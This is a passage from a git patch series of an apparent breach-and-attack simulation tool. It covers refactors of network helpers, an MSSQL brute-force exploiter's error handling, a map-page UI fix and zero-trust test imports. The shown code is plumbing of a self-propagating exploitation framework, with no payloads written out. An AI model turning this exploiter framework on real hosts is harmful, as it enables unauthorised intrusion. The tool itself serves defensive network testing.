try: + s.connect((dst, 1)) + ip_to_dst = s.getsockname()[0] + except KeyError: + LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.") + ip_to_dst = '127.0.0.1' + finally: + s.close() + return ip_to_dst + else: + # based on scapy implementation + + def atol(x): + ip = socket.inet_aton(x) + return struct.unpack("!I", ip)[0] + + routes = get_routes() + dst = atol(dst) + paths = [] + for d, m, gw, i, a in routes: + aa = atol(a) + if aa == dst: + paths.append((0xffffffff, ("lo", a, "0.0.0.0"))) + if (dst & m) == (d & m): + paths.append((m, (i, a, gw))) + if not paths: + return None + paths.sort() + ret = paths[-1][1] + return ret[1] \ No newline at end of file diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 89417757d..fec47a3cd 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -9,7 +9,7 @@ from infection_monkey.config import WormConfiguration from infection_monkey.utils.monkey_dir import get_monkey_dir_path from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..ce0433569 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -9,7 +9,7 @@ from urllib.parse import urlsplit import infection_monkey.monkeyfs as monkeyfs from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target __author__ = 'hoffer' diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index f2124f9fc..3544f46f3 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -7,9 +7,8 @@ from threading import Thread from infection_monkey.model import VictimHost from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import local_ips, get_free_tcp_port -from infection_monkey.network.tools import check_tcp_port +from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.transport.base import get_last_serve_time -from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'hoffer' From 1f5acbc28709d121e0b59181039f3bba6594e5ef Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 10:48:02 +0200 Subject: [PATCH 41/53] Another white screen fix --- .../cc/ui/src/components/pages/MapPage.js | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..f9d1f4a83 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -43,11 +43,13 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap') .then(res => res.json()) .then(res => { - res.edges.forEach(edge => { - edge.color = {'color': edgeGroupToColor(edge.group)}; - }); - this.setState({graph: res}); - this.props.onStatusChange(); + if (res.hasOwnProperty("edges")) { + res.edges.forEach(edge => { + edge.color = {'color': edgeGroupToColor(edge.group)}; + }); + this.setState({graph: res}); + this.props.onStatusChange(); + } }); }; @@ -55,14 +57,16 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { - let newTelem = this.state.telemetry.concat(res['telemetries']); + if ('telemetries' in res) { + let newTelem = this.state.telemetry.concat(res['telemetries']); - this.setState( - { - telemetry: newTelem, - telemetryLastTimestamp: res['timestamp'] - }); - this.props.onStatusChange(); + this.setState( + { + telemetry: newTelem, + telemetryLastTimestamp: res['timestamp'] + }); + this.props.onStatusChange(); + } }); }; From e5715f5a7ea3286c52d4d0a252ca09477d6ba7ff Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 12:11:22 +0200 Subject: [PATCH 42/53] Removed unnecessary logging of config in BB and MSSQL unhandled error --- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - monkey/infection_monkey/exploit/__init__.py | 6 ++++-- monkey/infection_monkey/exploit/mssqlexec.py | 4 ++-- monkey/infection_monkey/monkey.py | 6 +++++- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py index d2fad4e1e..8456dccad 100644 --- a/envs/monkey_zoo/blackbox/tests/basic_test.py +++ b/envs/monkey_zoo/blackbox/tests/basic_test.py @@ -23,7 +23,6 @@ class BasicTest(object): self.log_handler = log_handler def run(self): - LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2))) self.island_client.import_config(self.config_parser.config_raw) self.print_test_starting_info() try: diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..0431e7295 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -47,8 +47,10 @@ class HostExploiter(object, metaclass=ABCMeta): def exploit_host(self): self.pre_exploit() - result = self._exploit_host() - self.post_exploit() + try: + result = self._exploit_host() + finally: + self.post_exploit() return result def pre_exploit(self): diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..dee597a18 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth from infection_monkey.model import DROPPER_ARG from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError LOG = logging.getLogger(__name__) @@ -185,7 +185,7 @@ class MSSQLExploiter(HostExploiter): LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' 'aborting brute force'.format(host, port)) - raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) + raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) class MSSQLLimitedSizePayload(LimitedSizePayload): diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..3af70c796 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -26,7 +26,7 @@ from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach from infection_monkey.exploit.tools.helpers import get_interface_to_target -from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError +from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from infection_monkey.telemetry.attack.t1106_telem import T1106Telem from common.utils.attack_utils import ScanStatus, UsageEnum @@ -192,7 +192,9 @@ class InfectionMonkey(object): self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value) host_exploited = False for exploiter in [exploiter(machine) for exploiter in self._exploiters]: + if self.try_exploiting(machine, exploiter): + host_exploited = True VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send() break @@ -311,6 +313,8 @@ class InfectionMonkey(object): machine, exploiter.__class__.__name__, exc) self.successfully_exploited(machine, exploiter) return True + except FailedExploitationError as e: + LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) except Exception as exc: LOG.exception("Exception while attacking %s using %s: %s", machine, exploiter.__class__.__name__, exc) From c778ae7aa1ef87769ce41a7c8422e951bd556508 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:27:34 +0200 Subject: [PATCH 43/53] Changed import to `import common.data.zero_trust_consts as zero_trust_consts` Looks better --- .../cc/models/zero_trust/aggregate_finding.py | 6 +- .../cc/models/zero_trust/event.py | 4 +- .../cc/models/zero_trust/finding.py | 10 +- .../models/zero_trust/segmentation_finding.py | 6 +- .../zero_trust/test_aggregate_finding.py | 14 +- .../cc/models/zero_trust/test_event.py | 6 +- .../cc/models/zero_trust/test_finding.py | 16 +- .../zero_trust/test_segmentation_finding.py | 12 +- .../reporting/test_zero_trust_service.py | 252 +++++++++--------- .../services/reporting/zero_trust_service.py | 63 +++-- .../zero_trust_tests/antivirus_existence.py | 13 +- .../communicate_as_new_user.py | 11 +- .../zero_trust_tests/data_endpoints.py | 23 +- .../zero_trust_tests/machine_exploited.py | 12 +- .../zero_trust_tests/segmentation.py | 10 +- .../test_segmentation_zt_tests.py | 25 +- .../telemetry/zero_trust_tests/tunneling.py | 8 +- 17 files changed, 253 insertions(+), 238 deletions(-) diff --git a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py index c3ed52649..38b551047 100644 --- a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,7 +26,7 @@ class AggregateFinding(Finding): def add_malicious_activity_to_timeline(events): AggregateFinding.create_or_add_to_existing( - test=TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=STATUS_VERIFY, + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, events=events ) diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index 6ad728d66..89b581fa0 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -2,7 +2,7 @@ from datetime import datetime from mongoengine import EmbeddedDocument, DateTimeField, StringField -from common.data.zero_trust_consts import EVENT_TYPES +import common.data.zero_trust_consts as zero_trust_consts class Event(EmbeddedDocument): @@ -19,7 +19,7 @@ class Event(EmbeddedDocument): timestamp = DateTimeField(required=True) title = StringField(required=True) message = StringField() - event_type = StringField(required=True, choices=EVENT_TYPES) + event_type = StringField(required=True, choices=zero_trust_consts.EVENT_TYPES) # LOGIC @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index df4eb12f7..90c9e1dc3 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py @@ -5,7 +5,7 @@ Define a Document Schema for Zero Trust findings. from mongoengine import Document, StringField, EmbeddedDocumentListField -from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY +import common.data.zero_trust_consts as zero_trust_consts # Dummy import for mongoengine. # noinspection PyUnresolvedReferences from monkey_island.cc.models.zero_trust.event import Event @@ -30,18 +30,18 @@ class Finding(Document): times, or complex action we will perform - somewhat like an API. """ # SCHEMA - test = StringField(required=True, choices=TESTS) - status = StringField(required=True, choices=ORDERED_TEST_STATUSES) + test = StringField(required=True, choices=zero_trust_consts.TESTS) + status = StringField(required=True, choices=zero_trust_consts.ORDERED_TEST_STATUSES) events = EmbeddedDocumentListField(document_type=Event) # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance meta = {'allow_inheritance': True} # LOGIC def get_test_explanation(self): - return TESTS_MAP[self.test][TEST_EXPLANATION_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.TEST_EXPLANATION_KEY] def get_pillars(self): - return TESTS_MAP[self.test][PILLARS_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.PILLARS_KEY] # Creation methods @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py index 32a450f57..7633ed31f 100644 --- a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py @@ -1,11 +1,11 @@ from mongoengine import StringField -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding def need_to_overwrite_status(saved_status, new_status): - return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED) + return (saved_status == zero_trust_consts.STATUS_PASSED) and (new_status == zero_trust_consts.STATUS_FAILED) class SegmentationFinding(Finding): @@ -35,7 +35,7 @@ class SegmentationFinding(Finding): new_finding = SegmentationFinding( first_subnet=subnets[0], second_subnet=subnets[1], - test=TEST_SEGMENTATION, + test=zero_trust_consts.TEST_SEGMENTATION, status=status, events=[segmentation_event] ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 59bf1aa66..ce28ad7f7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,9 +10,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)] + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + events = [Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) AggregateFinding.create_or_add_to_existing(test, status, events) @@ -29,9 +29,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK) + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + event = Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) events = [event] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index c0742407d..4a5afba50 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -14,7 +14,7 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title=None, # title required message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) with self.assertRaises(ValidationError): @@ -28,5 +28,5 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title="skjs", message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index c7190d0f1..4299f7eb4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -20,20 +20,20 @@ class TestFinding(IslandTestCase): self.clean_finding_db() with self.assertRaises(ValidationError): - _ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[]) + _ = Finding.save_finding(test="bla bla", status=zero_trust_consts.STATUS_FAILED, events=[]) with self.assertRaises(ValidationError): - _ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[]) + _ = Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status="bla bla", events=[]) def test_save_finding_sanity(self): self.fail_if_not_testing_env() self.clean_finding_db() - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) event_example = Event.create_event( - title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK) - Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example]) + title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example]) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 1) - self.assertEqual(len(Finding.objects(status=STATUS_FAILED)), 1) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1) + self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py index 8258d7bdf..4afff9fe4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding @@ -12,11 +12,11 @@ class TestSegmentationFinding(IslandTestCase): first_segment = "1.1.1.0/24" second_segment = "2.2.2.0-2.2.2.254" third_segment = "3.3.3.3" - event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK) + event = Event.create_event("bla", "bla", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) SegmentationFinding.create_or_add_to_existing_finding( subnets=[first_segment, second_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -26,7 +26,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, first_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -36,7 +36,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[first_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -45,7 +45,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index 98b99ac13..328be2e00 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -1,185 +1,197 @@ -from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ - TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ - PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ - TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ - TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ - PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase EXPECTED_DICT = { - AUTOMATION_ORCHESTRATION: [], - DATA: [ + zero_trust_consts.AUTOMATION_ORCHESTRATION: [], + zero_trust_consts.DATA: [ { - "principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_DATA_TRANSIT], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - DEVICES: [ + zero_trust_consts.DEVICES: [ { - "principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ENDPOINT_SECURITY], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_MACHINE_EXPLOITED][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - NETWORKS: [ + zero_trust_consts.NETWORKS: [ { - "principle": PRINCIPLES[PRINCIPLE_SEGMENTATION], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_SEGMENTATION], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SEGMENTATION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - PEOPLE: [ + zero_trust_consts.PEOPLE: [ { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] } ], - VISIBILITY_ANALYTICS: [ + zero_trust_consts.VISIBILITY_ANALYTICS: [ { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": 